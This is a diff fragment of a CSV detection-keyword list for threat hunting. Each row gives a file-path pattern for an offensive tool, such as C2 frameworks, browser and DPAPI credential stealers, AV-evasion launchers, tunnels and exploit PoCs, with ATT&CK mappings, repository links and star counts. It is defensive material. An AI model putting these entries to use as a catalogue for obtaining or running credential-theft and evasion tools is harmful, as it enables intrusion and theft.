T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/C2Profiles/*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/C2script/*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" -"*/C2Server.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/C2Server.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*/C2-Tool-Collection/*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF 
and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*/cain.html*","offensive_tool_keyword","Cain&Abel","Cain & Able exploitation tool file ","T1075 - T1110 - T1071 - T1003 - T1555","TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/undergroundwires/CEH-in-bullet-points/blob/master/chapters/08-sniffing/sniffing-tools.md","1","1","N/A","N/A","8","743","233","2023-09-28T15:38:54Z","2021-05-11T12:38:17Z" +"*/cain.html*","offensive_tool_keyword","Cain&Abel","Cain & Able exploitation tool file ","T1075 - T1110 - T1071 - T1003 - T1555","TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/undergroundwires/CEH-in-bullet-points/blob/master/chapters/08-sniffing/sniffing-tools.md","1","1","N/A","N/A","8","745","233","2023-09-28T15:38:54Z","2021-05-11T12:38:17Z" "*/campaign/*/implant/get_all*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" -"*/canary.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/canary.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - 
T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*/CandyPotato.cpp*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/CandyPotato.sdf*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/CandyPotato.sln*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/CandyPotato.vcxproj*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" -"*/CapBypass.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*/CapBypass.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" "*/carlosevieira/Dirty-Pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" "*/cassandra-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cassandra-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cc2_frp.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/cccam-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/cerbrutus*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","290","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" -"*/Certipy.git*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*/Certipy/*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*/cerbrutus*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. 
Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" +"*/Certipy.git*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*/Certipy/*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "*/CertStealer*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" -"*/certsync.git*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" -"*/cfn__resource_injection_lambda*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/certsync.git*","offensive_tool_keyword","certsync","Dump NTDS with golden 
certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*/cfn__resource_injection_lambda*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*/ChainBuilder.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" -"*/charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" -"*/charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*/charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*/charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - 
T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*/CheckPort.exe*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*/CheeseTools.git*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" -"*/Chimera.git*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*/Chimera.git*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" -"*/chimera.py*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" -"*/chimera.sh*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*/chisel.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*/chisel.git*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*/chisel@latest*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*/chisel-darwin_amd64*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*/chisel-freebsd*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*/chisel-linux_*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over 
HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*/chisel-master*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*/chisel-windows_amd6*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/Chimera.git*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/Chimera.git*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*/chimera.py*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*/chimera.sh*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus 
solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/chisel.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel.git*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel@latest*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-darwin_amd64*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-freebsd*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-linux_*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-master*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over 
HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-windows_amd6*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" "*/chrisk44/*","offensive_tool_keyword","Github Username","Github username known for network exploitation tools","N/A","N/A","N/A","N/A","Network Exploitation tools","https://github.com/chrisk44/Hijacker","1","1","N/A","N/A","10","2213","435","2020-08-26T19:01:31Z","2016-11-25T01:39:07Z" -"*/chrome_decrypt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/chrome_decrypt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*/ChromeDump/*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*/chromium_based_browsers.py*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - 
T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*/cics-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -3056,8 +3062,8 @@
 "*/citrix-enum-servers-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/clamav-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/clickme.docx*","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","107","33","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z"
-"*/client/beef.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
